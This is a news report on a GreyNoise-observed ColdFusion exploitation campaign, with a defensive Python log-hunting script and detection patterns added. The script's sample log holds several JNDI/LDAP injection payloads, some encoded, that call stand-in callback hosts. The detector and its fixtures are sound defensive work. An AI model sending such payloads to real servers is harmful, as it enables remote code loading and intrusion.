A threat actor has been targeting roughly a dozen vulnerabilities in Adobe ColdFusion as part of a massive initial access campaign, GreyNoise warns.
During the Christmas 2025 holiday, the threat intelligence firm observed thousands of requests targeting ColdFusion servers globally, apparently part of a single, coordinated intrusion effort.
The requests mainly originated from Japan-based infrastructure (associated with CTG Server Limited), with two IP addresses accounting for most of the observed traffic.
GreyNoise observed approximately 6,000 requests targeting ColdFusion vulnerabilities that were publicly disclosed in 2023 and 2024, with the activity peaking on December 25.
“The campaign leveraged ProjectDiscovery Interactsh for out-of-band callback verification, with JNDI/LDAP injection as the primary attack vector. The deliberate timing during Christmas Day (68% of traffic) suggests intentional targeting during reduced security monitoring periods,” GreyNoise notes.
Most of the requests targeted servers in the US (4,044), Spain (753), India (128), and Canada, Chile, Germany, and Pakistan (100 each).
The two primary IP addresses involved in the Adobe ColdFusion exploitation were active concurrently 41% of the time, sending requests at 1-5 second intervals and cycling through 11 distinct attack types against each target.
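The traffic pattern described above (JNDI/LDAP injection payloads, out-of-band callbacks to Interactsh, and a small number of sources cycling through many distinct attack variants at a few seconds' spacing) is something a defender can hunt for in ordinary web-server access logs. The script below is an added example written for this page, not GreyNoise's tooling or any ColdFusion code: it parses Apache combined-format log lines (the format is an assumption; adapt the regex for IIS or the ColdFusion built-in web server), decodes URL-encoded parameters, looks for JNDI lookup strings and the default public Interactsh domains (a self-hosted Interactsh server would use a different domain, so treat that list as a starting point), and flags a source IP that hits many distinct endpoints with such payloads at a median spacing of five seconds or less. The thresholds, endpoint paths, callback hostnames and log lines are all constructed for the example.

```python
import re
import urllib.parse
from collections import defaultdict
from datetime import datetime
from statistics import median

# Apache combined log format (assumption): ip - - [ts] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# JNDI lookup string as injected into a log4j-style template: ${jndi:ldap://host/x}
JNDI_RE = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

# Default public ProjectDiscovery Interactsh domains; a self-hosted server uses its own domain (assumption)
OOB_DOMAINS = ("interact.sh", "oast.fun", "oast.live", "oast.site", "oast.online", "oast.pro", "oast.me")


def decode(text):
    """URL-decode twice so double-encoded payloads (%2524%257B...) are also exposed."""
    return urllib.parse.unquote(urllib.parse.unquote(text))


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    # Payloads show up in the query string, the Referer or the User-Agent, so inspect all three
    rec["decoded"] = decode(rec["path"] + " " + rec["ref"] + " " + rec["ua"])
    return rec


def is_jndi(text):
    return bool(JNDI_RE.search(text))


def has_oob_callback(text):
    lowered = text.lower()
    return any(domain in lowered for domain in OOB_DOMAINS)


def analyze(lines, min_variants=5, max_median_gap=5.0):
    """Group suspicious requests per source IP and flag sources that cycle through
    many distinct attack variants (distinct request paths) at a tight cadence.
    Thresholds are assumptions; the campaign on this page used 11 variants at 1-5 s."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and (is_jndi(rec["decoded"]) or has_oob_callback(rec["decoded"])):
            per_ip[rec["ip"]].append(rec)

    report = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        variants = {r["path"].split("?", 1)[0] for r in recs}
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(recs, recs[1:])]
        median_gap = median(gaps) if gaps else None
        report[ip] = {
            "requests": len(recs),
            "variants": len(variants),
            "jndi": sum(is_jndi(r["decoded"]) for r in recs),
            "oob_callback": sum(has_oob_callback(r["decoded"]) for r in recs),
            "median_gap_s": median_gap,
            "flagged": len(variants) >= min_variants
            and median_gap is not None
            and median_gap <= max_median_gap,
        }
    return report


# Constructed sample log: one scanner cycling six endpoints every 2 s, one lone JNDI probe, one benign hit.
SAMPLE_LOG = [
    '203.0.113.10 - - [25/Dec/2025:03:14:01 +0000] "GET /index.cfm?q=%24%7Bjndi%3Aldap%3A%2F%2Fcf1.abc123.oast.fun%2Fa%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [25/Dec/2025:03:14:03 +0000] "POST /CFIDE/administrator/index.cfm HTTP/1.1" 200 512 "-" "${jndi:ldap://cf2.abc123.oast.fun/b}"',
    '203.0.113.10 - - [25/Dec/2025:03:14:05 +0000] "GET /cfusion/login.cfm?user=${jndi:rmi://cf3.abc123.oast.fun/c} HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [25/Dec/2025:03:14:07 +0000] "GET /api/v1/status.cfm?x=%2524%257Bjndi%253Aldap%253A%252F%252Fcf4.abc123.oast.fun%252Fd%257D HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [25/Dec/2025:03:14:09 +0000] "GET /search.cfm?term=test HTTP/1.1" 200 900 "${jndi:dns://cf5.abc123.oast.fun/e}" "Mozilla/5.0"',
    '203.0.113.10 - - [25/Dec/2025:03:14:11 +0000] "GET /rest/v1/ping.cfm?cb=%24%7Bjndi%3Aldaps%3A%2F%2Fcf6.abc123.oast.fun%2Ff%7D HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '192.0.2.5 - - [25/Dec/2025:04:00:00 +0000] "GET /index.cfm?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.99%2Fx%7D HTTP/1.1" 200 512 "-" "curl/8.0"',
    '198.51.100.7 - - [25/Dec/2025:04:01:00 +0000] "GET /index.cfm HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG).items():
        print(ip, summary)
```

Run it over a real access log by replacing `SAMPLE_LOG` with `open(path)`. The lone probe from 192.0.2.5 is reported but not flagged, since a single JNDI request carries no cadence and no variant spread; a flagged source is one that both injects and walks many endpoints quickly, which is the behaviour worth blocking and correlating with outbound LDAP or DNS traffic from the ColdFusion host.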
GreyNoise’s investigation revealed that the ColdFusion attacks represent only a small fraction of the malicious activity associated with the two IP addresses.
The IPs, likely operated by an initial access broker running a much larger exploitation campaign, have generated over 2.5 million requests targeting more than 700 vulnerabilities across dozens of technology stacks, the threat intelligence firm says.
GreyNoise also notes that the ISP hosting the infrastructure has previously been linked to malicious operations such as phishing and spam.
Operating AS152194, the hosting provider is registered in Hong Kong, controls over 200,000 IPv4 addresses, and likely operates with limited abuse enforcement, GreyNoise notes.